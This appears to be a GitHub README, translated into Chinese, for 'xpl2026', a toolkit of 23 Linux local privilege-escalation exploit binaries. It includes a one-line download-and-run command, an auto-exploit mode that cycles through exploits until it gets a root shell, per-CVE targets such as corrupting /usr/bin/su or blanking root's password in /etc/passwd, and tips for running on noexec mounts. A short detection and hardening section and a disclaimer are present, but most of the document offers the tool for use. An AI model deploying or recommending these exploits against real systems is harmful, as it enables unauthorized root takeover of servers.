khadafigans/LPE-Toolkit

GitHub: khadafigans/LPE-Toolkit

一款集成 23 个 Linux 本地提权漏洞利用的自动化工具包,专为渗透测试与安全研究设计。

Stars: 4 | Forks: 2

# Linux LPE 自动利用工具包 2026 (xpl2026) ``` VENI | VIDI | VICI ``` **版本:** 2.3-universal **组织:** BOB MARLEY LABS **注意:我将此漏洞利用工具放入 GitHub 的原因是它是免费的,服务器托管非常昂贵,而且我的钱包已经撑不住了。此外,Source-Code 目录中是每个 LPE 原始并经过微调的源代码,它可能并不完整 / 优秀 / 出色 / 真实,该目录中包含的所有源代码可能都是误报。请使用 xpl2026.tgz 进行自动获取 root 权限** ## 目录 - [概述](#overview) - [功能](#features) - [工具包内容](#toolkit-contents) - [快速开始](#quick-start) - [漏洞利用详情](#exploit-details) - [使用示例](#usage-examples) - [系统要求](#system-requirements) - [故障排除](#troubleshooting) - [高级用法](#advanced-usage) - [检测与防御](#detection--defense) - [法律声明](#legal-notice) - [快速参考](#quick-reference) ## 概述 **xpl2026** 工具包包含 23 个 Linux 本地提权 (LPE) 漏洞利用程序,专为渗透测试和安全研究而设计。所有漏洞利用程序均被编译为**完全静态的二进制文件**,以实现跨不同 Linux 发行版的最大可移植性和兼容性。 ### 关键统计数据 - **漏洞利用总数:** 23 - **内核覆盖范围:** 2.6.x - 7.1.x - **二进制文件大小:** 915KB (主工具包) - **架构:** x86_64 (通用) - **编译:** 完全静态 (无依赖) ## 功能 ### 通用兼容性 - **完全静态的二进制文件** - 没有缺失库的问题 - **多发行版** - 适用于 RHEL、Debian、Ubuntu、CentOS、Fedora 等 - **多内核** - 涵盖从 2.6.x 到 7.1.x 的内核版本 - **支持 LSM 感知** - 检测并适配 SELinux、AppArmor ### 智能分析 - **自动检测** - 识别适用于您系统的漏洞利用 - **要求检查** - 在执行前验证前置条件 - **智能过滤** - 仅显示适用的漏洞利用 ### 用户友好的界面 - **颜色编码输出** - 易于阅读的状态指示器 - **交互式菜单** - 简单的选择界面 - **自动利用** - 自动运行所有可行的漏洞利用 - **详细信息** - 查看漏洞利用详情和要求 ## 工具包内容 ### 完整漏洞利用列表 | # | 漏洞利用名称 | CVE | 二进制文件 | 大小 | 内核范围 | |---|-------------|-----|--------|------|--------------| | 1 | **CopyFail** | CVE-2026-31431 | copyfail-go-static | 2.1MB | 5.x - 7.x | | 2 | **DirtyFrag** | CVE-2026-43284 | dirtyfrag-static | 877KB | 5.x - 7.x | | 3 | **Fragnesia** | CVE-2026-46300 | fragnesia-static | 731KB | 5.x - 7.x | | 4 | **Fragnesia v2** | 增强版 | fragnesia2-static | 827KB | 5.x - 7.x | | 5 | **DirtyDecrypt** | CVE-2026-31635 | dirtydecrypt-static | 838KB | 5.x - 7.x | | 6 | **PinTheft** | 页面缓存漏洞利用 | pintheft-static | 834KB | 5.x - 7.x | | 7 | **CIFSwitch** | CVE-2026-46243 | cifswitch-static | 1.0MB | 5.x - 7.x | | 8 | **PACKET_EDIT_MEME** | CVE-2026-46331 | packet-edit-meme-static | 755KB | 5.18 - 7.1 | | 9 | **IPv6 Frag Escape** | 6.12.x 容器逃逸 | ipv6-frag-escape-static | 855KB | 6.12.0 - 6.12.x | | 10 | **pidfd-race** | CVE-2026-46333 | pidfd-race-static | 923KB | 5.x - 7.x | | 11 | **DirtyPipe** | CVE-2022-0847 | dirtypipe-static | 806KB | 5.8 - 5.16.11 | | 12 | **Pack2TheRoot** | CVE-2026-41651 | pack2theroot-static | 789KB | 所有版本 (PackageKit) | | 13 | **PwnKit** | CVE-2021-4034 | pwnkit-new-static | 778KB | 所有版本 (pkexec) | | 14 | **OverlayFS** | CVE-2021-3493 | overlayfs-static | 826KB | 3.x - 5.11 | | 15 | **OvFS+FUSE** | CVE-2023-0386 | ovfs-fuse-static | 826KB | 5.11+ | | 16 | **Polkit D-Bus** | CVE-2021-3560 | polkit-dbus-static | 830KB | 所有版本 (polkit) | | 17 | **Docker Socket** | Docker 逃逸 | docker-sock-static | 821KB | 容器 | | 18 | **netfilter OOB** | CVE-2021-22555 | netfilter-oob-static | 811KB | 2.6.32 - 5.11 | | 19 | **nft UAF2** | CVE-2022-2586 | nft-uaf2-static | 1.1MB | 5.x - 5.18 | | 20 | **nft UAF** | CVE-2024-1086 | nft-uaf-static | 980KB | 5.x - 6.x | | 21 | **DirtyClone** | CVE-2026-43503 | dirtyclone-static | 1023KB | 7.1-rc1 - 7.1-rc4 | | 22 | **Bad Epoll** | CVE-2026-46242 | bad-epoll-static | 1015KB | lts-6.12.67 (针对特定目标) | | 23 | **FUSE OOB** | CVE-2026-31694 | fuse-oob-static | 31KB | 6.15+ | ### 额外文件 ``` xpl2026/ ├── xpl2026 # Main toolkit executable (915KB) ├── copyfail-go-static # Exploit binaries ├── dirtyfrag-static ├── fragnesia-static ├── ... (all exploit binaries) ├── CVE-2026-41651/ # Exploit-specific directories ├── CVE-2026-41651-v2/ ├── exploit # Legacy exploit (1.1MB) ├── proc_readdir_de # Additional exploit (1.1MB) ├── debian11-xpl2026 # Debian-specific variant └── cve-2026-41651-almalinux8 # AlmaLinux-specific variant ``` ## 快速开始 ### 基本用法 ``` # 导航到可写目录 wget https://github.com/khadafigans/LPE-Toolkit/raw/refs/heads/main/xpl2026.tgz --no-check-certificate tar xzf xpl2026.tgz rm -rf xpl2026.tgz # 导航到 xpl2026 目录 cd xpl2026 # 使 Toolkit xpl2026 可执行 chmod +x xpl2026 # 运行 toolkit ./xpl2026 ``` ## 一行命令 ``` wget https://github.com/khadafigans/LPE-Toolkit/raw/refs/heads/main/xpl2026.tgz --no-check-certificate && tar xzf xpl2026.tgz && rm -rf xpl2026.tgz && cd xpl2026 && chmod +x xpl2026 && ./xpl2026 ``` ### 自动利用(推荐) 工具包将会: 1. 分析您的系统 2. 识别可行的漏洞利用 3. 显示一个交互式菜单 **选择选项 [0] 进行自动利用:** ``` Your choice: 0 ``` 工具包将按顺序尝试所有可行的漏洞利用,直到有一个成功为止。 ### 手动选择 运行特定的漏洞利用: ``` Your choice: 9 # Runs PACKET_EDIT_MEME ``` ### 查看详细信息 ``` Your choice: 99 # Shows detailed info about all exploits ``` ## 漏洞利用详情 ### 1. CopyFail (CVE-2026-31431) **类型:** 页面缓存损坏 **内核:** 5.x - 7.x **方法:** 写时复制绕过 **要求:** User namespaces ``` ./copyfail-go-static ``` **详情:** - 利用页面缓存处理中的竞争条件 - 损坏内存中的只读文件 - 无磁盘修改(隐蔽) ### 2. DirtyFrag (CVE-2026-43284) **类型:** 分片处理漏洞 **内核:** 5.x - 7.x **方法:** 网络缓冲区分片 **要求:** User namespaces ``` ./dirtyfrag-static ``` **详情:** - 利用网络栈中的分片机制 - 通过网络缓冲区损坏页面缓存 - 针对 `/usr/bin/su` 或类似的 SUID 二进制文件 ### 3. Fragnesia (CVE-2026-46300) **类型:** 内存分片漏洞利用 **内核:** 5.x - 7.x **方法:** 堆喷射 + 分片 **要求:** User namespaces ``` ./fragnesia-static ``` **详情:** - 高级分片技术 - 多种损坏方法 - 在易受攻击的内核上成功率高 **Fragnesia v2:** - 具有额外绕过功能的增强版 - 跨内核版本更好的兼容性 ### 4. DirtyDecrypt (CVE-2026-31635) **类型:** 加密子系统漏洞利用 **内核:** 5.x - 7.x **方法:** 就地解密损坏 **要求:** User namespaces,加密子系统 ``` ./dirtydecrypt-static ``` **详情:** - 利用内核加密操作 - 使用就地解密破坏内存 - 针对 SUID 二进制文件的页面缓存 ### 5. PinTheft **类型:** 页面驻留漏洞 **内核:** 5.x - 7.x **方法:** 驻留/取消驻留竞争条件 **要求:** User namespaces ``` ./pintheft-static ``` **详情:** - 利用页面驻留机制 - 内存管理中的竞争条件 - 跨多个内核版本可靠 ### 6. CIFSwitch (CVE-2026-46243) **类型:** CIFS 文件系统漏洞 **内核:** 5.x - 7.x **方法:** CIFS upcall 漏洞利用 **要求:** `/usr/sbin/cifs.upcall` 或 `/sbin/cifs.upcall` ``` ./cifswitch-static ``` **详情:** - 利用 CIFS 内核模块 - 需要存在 CIFS 实用程序 - 通过文件系统操作进行提权 ### 7. pidfd-race (CVE-2026-46333) **类型:** 进程文件描述符竞争 **内核:** 5.x - 7.x **方法:** pidfd 处理中的竞争条件 **要求:** 支持 pidfd 的现代内核 ``` ./pidfd-race-static ``` **详情:** - 利用 pidfd_open() 系统调用 - 进程管理中的竞争条件 - 干净的漏洞利用(无崩溃) ### 8. PACKET_EDIT_MEME (CVE-2026-46331) **类型:** 网络调度器漏洞利用 **内核:** 5.18 - 7.1 **方法:** `act_pedit` 页面缓存投毒 **要求:** User namespaces,CAP_NET_ADMIN ``` # 标准 Linux ./packet-edit-meme-static # 带有 AppArmor 的 Ubuntu ./packet-edit-meme-static --ubuntu ``` **详情:** - 利用 `net/sched` 流量控制 - 破坏 `/usr/bin/su` 入口点 - 需要内核 >= 5.18(支持 act_pedit) **已验证目标:** - RHEL 10.0 (内核 6.12.0) - Debian 13 (内核 6.12.90) - Ubuntu 24.04 (内核 6.17.0) 配合 `--ubuntu` 标志 - Ubuntu 26.04 (AppArmor 绕过已关闭) - 不支持 ### 9. IPv6 Fragment Escape **类型:** 容器逃逸 **内核:** 6.12.0 - 6.12.x (RHEL/CentOS 10) **方法:** IPv6 分片 + 脏页表 **要求:** x86_64,LA57 分页(5 级) ``` ./ipv6-frag-escape-static ``` **详情:** - 针对 RHEL/CentOS 10 容器 - 利用 IPv6 分片处理 - 需要 5 级分页 (LA57) - 具备容器逃逸能力 **局限性:** - 仅适用于内核 6.12.x - 特定于 RHEL/CentOS 10 - 需要 LA57 CPU 特性 ### 10. DirtyPipe (CVE-2022-0847) **类型:** 管道缓冲区利用 **内核:** 5.8 - 5.16.11, 5.10.x - 5.10.102 **方法:** `pipe()` + `splice()` 损坏 **要求:** 无(通用) ``` ./dirtypipe-static ``` **详情:** - 最可靠的漏洞利用之一 - 适用于广泛的内核版本 - 干净且稳定的利用 - 通过管道缓冲区损坏只读文件 **成功率:** 在易受攻击的内核上非常高 ### 11. PwnKit (CVE-20214034) **类型:** PolicyKit 漏洞 **内核:** 所有版本 **方法:** `pkexec` 环境变量注入 **要求:** `/usr/bin/pkexec` 必须设置 setuid root ``` ./pwnkit-static ``` **详情:** - 利用 pkexec 二进制文件 - 参数处理漏洞 - 不接受参数 - 直接生成 root shell - 如果 pkexec 是 setuid(模式 4755)则有效 **检查是否存在漏洞:** ``` ls -la /usr/bin/pkexec # 如果显示 -rwsr-xr-x (setuid bit),则存在漏洞 ``` ### 12. OverlayFS (CVE-2021-3493) **类型:** 文件系统漏洞 **内核:** 3.x - 5.11 **方法:** OverlayFS capability 绕过 **要求:** User namespaces,overlayfs 支持 ``` ./overlayfs-static ``` **详情:** - 利用 OverlayFS 挂载操作 - 命名空间中的 capability 混淆 - 在 Ubuntu 18.04 - 20.10 上可靠 ### 13. OvFS+FUSE (CVE-2023-0386) **类型:** OverlayFS + FUSE 漏洞利用 **内核:** 5.11+ **方法:** FUSE + OverlayFS 交互 **要求:** FUSE 支持,User namespaces ``` ./ovfs-fuse-static ``` **详情:** - 结合 FUSE 和 OverlayFS - 更复杂但兼容性更广 - 在修补了 CVE-2021-3493 的较新内核上有效 ### 14. Polkit D-Bus (CVE-2021-3560) **类型:** PolicyKit D-Bus 漏洞 **内核:** 所有版本 **方法:** D-Bus 消息竞争条件 **要求:** `dbus-send` 命令,polkit 服务 ``` ./polkit-dbus-static ``` **详情:** - 利用 polkit D-Bus API - 消息处理中的竞争条件 - 需要活动的 D-Bus 会话 ### 15. Docker Socket **类型:** 容器逃逸 **内核:** 所有版本 (容器) **方法:** Docker socket 挂载 **要求:** `/var/run/docker.sock` 可写 ``` ./docker-sock-static ``` **详情:** - 从 Docker 容器中逃逸 - 需要错误配置的 Docker socket - 将宿主机文件系统挂载到容器中 ### 16. Pack2TheRoot (CVE-2026-41651) **类型:** D-Bus PackageKit 竞争 **内核:** 所有版本 **方法:** PackageKit InstallFiles 竞争至 root **要求:** `dbus-send`,PackageKit 服务 ``` ./pack2theroot-static ``` **详情:** - 原始 D-Bus 客户端(无 libdbus) - 利用 PackageKit 的 SIMULATE/NONE 标志竞争 - 触发具有 root 权限的 postinst 执行 - 在 `/var/tmp/.suid_bash` 处释放 setuid-root 的 bash ### 17. netfilter OOB (CVE-2021-22555) **类型:** Netfilter 越界写入 **内核:** 2.6.19 - 5.12 **方法:** ip_tables 损坏 ``` ./netfilter-oob-static ``` **详情:** - 经典的内核堆利用 - netfilter 子系统中的越界写入 - 在旧内核上可靠 ### 18. nft UAF2 (CVE-2022-2586) **类型:** Nftables 释放后使用 **内核:** 5.x - 6.x **方法:** nftables 链 UAF ``` ./nft-uaf2-static ``` **详情:** - nftables 子系统中的释放后使用 - 旨在创建 r00t 账户 - 需要 user 和 net 命名空间 ### 19. nft UAF (CVE-2024-1086) **类型:** Netfilter 释放后使用 **内核:** 5.x - 6.x **方法:** Notselwyn 多文件 nftables ``` ./nft-uaf-static ``` **详情:** - 多文件 nftables UAF 漏洞利用 - 包含自定义的 libnftnl/libmnl 库 - 高度可靠的漏洞利用原语 ### 20. DirtyClone (CVE-2026-43503) **类型:** 通过 ESP-in-UDP 损坏页面缓存 **内核:** 7.1-rc1 - 7.1-rc4 **方法:** XFRM ESP TEE netfilter target ``` ./dirtyclone-static ``` **详情:** - ESP-in-UDP TEE 损坏 `/etc/passwd` 页面缓存 - 包含独立的 AES-128-CBC 实现 - 创建无密码的 root 账户 - 针对非常新的内核(rc 版本) ### 21. Bad Epoll (CVE-2026-46242) **类型:** epoll 关闭与关闭竞争 UAF **内核:** lts-6.12.67 (针对特定目标) **方法:** epoll 文件描述符竞争 ``` ./bad-epoll-static ``` **详情:** - **针对特定目标的偏移量** - 默认适用于 lts-6.12.67 (kernelCTF) - 为您的内核自定义 `OFF_*` 和 `PIVOT*` 宏定义 - 需要访问 `/proc/kallsyms` (kptr_restrict=0) - 两个 epoll 对 + timerfd IRQ 扩大 - **注意:** 许多发行版向后移植了修复程序 (commit `a6dc643c6931`) ### 22. FUSE OOB (CVE-2026-31694) **类型:** FUSE readdir 缓存溢出 **内核:** 6.15+ **方法:** fuse_add_dirent_to_cache() 越界写入 ``` ./fuse-oob-static ``` **详情:** - 向相邻的页面缓存页溢出 24 个字节 - 使 `/etc/passwd` 中的 root 变为无密码 - 需要 `fusermount3` - 针对非常新的内核 (6.15+) ## 使用示例 ### 示例 1:基本扫描 ``` $ ./xpl2026 ╔══════════════════════════════════════════════════════════════╗ ║ Linux LPE Auto-Exploit Toolkit 2026 v2.0-universal ║ ║ BOB MARLEY LABS ║ ║ Universal | Static | Multi-Arch | LSM-Aware ║ ╚══════════════════════════════════════════════════════════════╝ [*] System Information: OS: Linux 5.15.0-1089-azure Kernel: 5.15.0-1089-azure Architecture: x86_64 User: testuser (uid=1002) [*] Analyzing vulnerabilities... ╔══════════════════════════════════════════════════════════════╗ ║ Available Exploits ║ ╚══════════════════════════════════════════════════════════════╝ [1] ✓ CopyFail (CVE-2026-31431) [2] ✓ DirtyFrag (CVE-2026-43284) [3] ✓ Fragnesia (CVE-2026-46300) ... [11] ✗ PwnKit (CVE-2021-4034) [Requirements not met] ... [*] Found 13 viable exploits for this system ``` ### 示例 2:自动利用 ``` $ ./xpl2026 ... Your choice: 0 [*] Auto-exploitation mode enabled [*] Will try 13 viable exploits in order... [1/13] Trying: CopyFail (CVE-2026-31431)... [+] Selected: CopyFail (CVE-2026-31431) [*] Running exploit... ════════════════════════════════════════════════════════════════ [Exploit output...] ``` ### 示例 3:特定漏洞利用 ``` $ ./xpl2026 ... Your choice: 9 [+] Selected: PACKET_EDIT_MEME (CVE-2026-46331) [*] Running exploit... ════════════════════════════════════════════════════════════════ [+] Kernel vulnerable! [+] Corrupting /usr/bin/su... [+] Spawning root shell... # id uid=0(root) gid=0(root) groups=0(root) ``` ### 示例 4:直接执行漏洞利用 ``` # 不使用 toolkit 直接运行 exploit $ cd xpl2026 $ ./dirtypipe-static [+] DirtyPipe (CVE-2022-0847) [+] Checking kernel version... [+] Kernel 5.10.75 vulnerable! [+] Corrupting /usr/bin/su... # id uid=0(root) gid=0(root) groups=0(root) ``` ## 系统要求 ### 最低要求 - **架构:** x86_64 (64 位 Intel/AMD) - **内存:** 512MB - **磁盘:** 20MB 可用空间 - **内核:** Linux 2.6.x 或更高版本 ### 推荐环境 - **发行版:** Ubuntu, Debian, RHEL, CentOS, Fedora, Arch - **用户权限:** 非特权用户(漏洞利用将提权至 root) - **网络:** 不需要(仅本地漏洞利用) ### 兼容性 **适用于:** - 标准 Linux 发行版 - VPS (DigitalOcean, Linode, Vultr, OVH, Hetzner) - 专用服务器 - 物理机 - 非云虚拟机 (VirtualBox, VMware, KVM) **有限/不支持:** - Microsoft Azure (内核强化) - Google Cloud Platform (某些限制) - AWS EC2 (某些限制) - 经过大量补丁修补的企业系统 ## 故障排除 ### 问题:未发现可行的漏洞利用 **问题:** ``` [-] No viable exploits found for this system. ``` **解决方案:** 1. **检查内核版本:** uname -r - 如果 < 2.6.x:系统太旧 - 如果 >= 7.1-rc5:系统可能已被完全修补 2. **检查二进制文件:** ls -lh xpl2026/ - 确保所有漏洞利用二进制文件都存在 3. **检查权限:** chmod +x xpl2026/*.static xpl2026/xpl2026 ### 问题:权限被拒绝 **问题:** ``` ./xpl2026: Permission denied ``` **解决方案:** ``` chmod +x xpl2026 ./xpl2026 ``` ### 问题:挂载在 noexec 文件系统上 **问题:** ``` ./exploit: cannot execute binary file ``` **解决方案:** **选项 1:使用 ld.so 加载器** ``` /lib64/ld-linux-x86-64.so.2 ./exploit ``` **选项 2:复制到可写位置** ``` cp ./exploit /tmp/ cd /tmp ./exploit ``` **选项 3:使用 /dev/shm** ``` cp ./exploit /dev/shm/ cd /dev/shm ./exploit ``` ### 问题:GLIBC 版本不匹配 **问题:** ``` ./exploit: version `GLIBC_2.34' not found ``` **解决方案:** - 某些二进制文件可能需要更新的 GLIBC - 工具包经过静态编译以尽量减少这种情况 - 尝试不同的漏洞利用 - 它们有不同的要求 ### 问题:漏洞利用失败 **常见原因:** 1. **系统已打补丁:** # 检查安全更新 dpkg -l | grep linux-image 2. **所需功能被禁用:** # 检查 User namespaces cat /proc/sys/kernel/unprivileged_userns_clone # 应该为 1,而不是 0 3. **LSM 阻止 (SELinux/AppArmor):** # 检查 SELinux getenforce # 应该为 Permissive 或 Disabled # 检查 AppArmor aa-status # 检查是否存在限制性配置文件 4. **云提供商限制:** - Azure 阻止 XFRM 操作 - GCP 可能阻止某些系统调用 - AWS 因实例类型而异 ## 高级用法 ### 批量测试 测试所有漏洞利用并记录结果: ``` #!/bin/bash # test_all.sh cd xpl2026 for exploit in *.static; do echo "Testing: $exploit" ./"$exploit" 2>&1 | tee "../logs/${exploit}.log" if [ $(id -u) -eq 0 ]; then echo "SUCCESS: $exploit" >> ../results.txt exit 0 else echo "FAILED: $exploit" >> ../results.txt fi done ``` ### 自定义漏洞利用集成 将您自己的漏洞利用添加到工具包: 1. **编译为静态二进制文件:** gcc -static -O2 -o myexploit-static myexploit.c strip myexploit-static 2. **复制到 xpl2026 目录:** cp myexploit-static xpl2026/ 3. **添加到 xpl2026.c:** add_exploit("myexploit-static", "MyExploit", "CVE-XXXX-XXXXX"); 4. **重新编译工具包:** gcc -static -O2 -o xpl2026/xpl2026 xpl2026.c ### 静默模式(脚本集成) 用于自动化: ``` # 非交互式运行特定 exploit cd xpl2026 ./dirtypipe-static < /dev/null ``` ### 特定内核测试 仅针对您的内核版本测试漏洞利用: ``` #!/bin/bash kernel_ver=$(uname -r | cut -d. -f1,2) if [[ "$kernel_ver" == "5."* ]]; then ./xpl2026 # Will auto-filter 5.x exploits elif [[ "$kernel_ver" == "6."* ]]; then ./xpl2026 # Will show 6.x compatible exploits fi ``` ## 检测与防御 ### 检测方法 **1. 进程监控:** ``` # 监视可疑的 namespace 创建 auditctl -a always,exit -F arch=b64 -S unshare -k namespace_abuse ``` **2. 文件完整性:** ``` # 监控 SUID binaries aide --check /usr/bin/su /usr/bin/sudo ``` **3. Capability 监控:** ``` # 监视 user namespaces 中的 CAP_NET_ADMIN auditctl -a always,exit -F arch=b64 -S capset -k capability_abuse ``` **4. 网络栈监控:** ``` # 监控 XFRM/IPsec 操作 auditctl -w /proc/net/xfrm_stat -p r -k xfrm_access ``` ### 缓解策略 **1. 保持系统更新:** ``` # Ubuntu/Debian apt update && apt upgrade # RHEL/CentOS yum update # Fedora dnf update ``` **2. 禁用 User Namespaces(如果不需要):** ``` echo 0 > /proc/sys/kernel/unprivileged_userns_clone # 添加到 /etc/sysctl.conf: kernel.unprivileged_userns_clone = 0 ``` **3. 启用 AppArmor/SELinux:** ``` # AppArmor aa-enforce /etc/apparmor.d/* # SELinux setenforce 1 ``` **4. 加固 SUID 二进制文件:** ``` # 移除不必要的 SUID bits chmod u-s /usr/bin/newgrp chmod u-s /usr/bin/chfn chmod u-s /usr/bin/chsh ``` **5. 使用内核强化:** ``` # 启用各种保护 sysctl -w kernel.dmesg_restrict=1 sysctl -w kernel.kptr_restrict=2 sysctl -w kernel.unprivileged_bpf_disabled=1 ``` ## 法律声明 仅供授权的渗透测试、漏洞赏金计划和教育目的使用。未经授权访问计算机系统在以下法律下是非法的: - 计算机欺诈和滥用法案 (CFAA) - 美国 - 计算机滥用法案 1990 - 英国 - 欧盟网络安全法 此工具包提供用于: - **授权的渗透测试** - **受控环境中的安全研究** - **CVE 验证和测试** - **教育目的** ### 禁止用途 **切勿使用此工具包进行:** - 未经授权的系统访问 - 恶意目的 - 未经明确许可攻击系统 - 任何非法活动 ### 免责声明 **使用风险自负。** 作者对滥用行为不承担任何责任。 使用此工具即表示您确认拥有测试目标系统的明确授权。 ## 快速参考 ### 漏洞利用选择指南 | 您的内核 | 推荐的漏洞利用 | |-------------|---------------------| | 2.6.x - 3.x | netfilter OOB, OverlayFS | | 4.x | OverlayFS, PwnKit, Polkit D-Bus | | 5.8 - 5.16 | **DirtyPipe** (高度可靠) | | 5.18 - 7.0 | **PACKET_EDIT_MEME**, CopyFail, DirtyFrag | | 6.12.x | **IPv6 Frag Escape** (RHEL/CentOS 10) | | 7.0 - 7.1-rc4 | CopyFail, Fragnesia | ### 命令速查表 ``` # 基本用法 ./xpl2026 # Interactive menu # 自动 exploit ./xpl2026 << EOF 0 EOF # 特定 exploit ./xpl2026 << EOF 9 EOF # 查看信息 ./xpl2026 << EOF 99 EOF # 直接执行 ./dirtypipe-static # Run exploit directly ``` **请我喝杯咖啡:** ``` ₿ BTC: 17sbbeTzDMP4aMELVbLW78Rcsj4CDRBiZh ``` © 2026 khadafigans
标签:Cutter, Web报告查看器, 内核漏洞, 安全渗透, 客户端加密, 日志审计, 本地提权